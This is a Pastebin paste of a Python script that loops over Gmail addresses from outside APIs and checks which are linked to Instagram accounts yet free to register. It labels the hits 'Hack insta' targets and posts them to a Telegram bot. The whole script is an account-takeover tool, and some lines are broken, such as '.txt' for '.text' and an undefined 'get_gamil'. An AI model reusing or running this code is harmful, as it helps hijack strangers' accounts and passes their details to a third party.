awseqehaider

Untitled

Dec 30th, 2021
247
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 1.76 KB | None | 0 0
  1. import requests
  2. import pyfiglet
  3. import webbrowser
  4.  
  5. Ab='\033[1;92m'
  6. aB='\033[1;91m'
  7. AB='\033[1;96m'
  8. aBbs='\033[1;93m'
  9. AbBs='\033[1;95m'
  10. A_bSa = '\033[1;31m'
  11. a_bSa = '\033[1;32m'
  12. faB_s = '\033[2;32m'
  13. a_aB_s = '\033[2;39m'
  14. Ba_bS = '\033[2;36m'
  15. Ya_Bs = '\033[1;34m'
  16. S_aBs = '\033[1;33m'
  17.  
  18. class Haider:
  19.     def get_email():
  20.         api = "http://tle0.pythonanywhere.com/api/Marko/Generation/email"
  21.         req = requests.get(api).json()
  22.         email = str(req["Gmail"])
  23.         return email
  24.     def Ch_insta(email):
  25.         api = f"http://mrez.pythonanywhere.com/api/Marko/email{email}"
  26.         req = requests.get(api).text
  27.         if str("True") in str(req):
  28.             return True
  29.         else:
  30.             return False
  31.     def Ch_gmail(email):
  32.         api = f"http://markotools.pythonanywhere.com/api/Marko/email{email}"
  33.         req = requests.get(api).txt
  34.         if str("True") in str(req):
  35.             return True
  36.         else:
  37.             return False
  38.            
  39.            
  40.            
  41. webbrowser.open('https://t.me/lis_5_t')
  42. h = pyfiglet.figlet_format('HAIDER')
  43. print(Ab +h)
  44.            
  45. token = input (aB +"ENTER TOKEN :")
  46. id = input (aB +"ENTER ID :")
  47. webbrowser.open('https://t.me/HAIDERGAMER1')
  48. while True:
  49.     get_email = Haider.get_email()
  50.     ch_insta = Haider.Ch_insta(get_email)
  51.     if ch_insta == True:
  52.         ch_gmail = Haider.Ch_gmail(get_email)
  53.         if ch_gmail == True:
  54.             print(f" Done : {get_email}"+ Ab)
  55.             text = f"اتفضل هاذا الحساب من اخوك حيدر   {get_email} "
  56.             tlg = f"https://api.telegram.org/bot{token}/sendMessage?chat_id={id}&text=\n {text} \n"
  57.             i = requests.post(tlg)
  58.         else:
  59.             print(f"Not Gamil : {get_gamil}"+ Ab)
  60.     else:
  61.         print(f"No Hack insta : {get_email}"+ Ab)
  62.        
Advertisement
Add Comment
Please, Sign In to add comment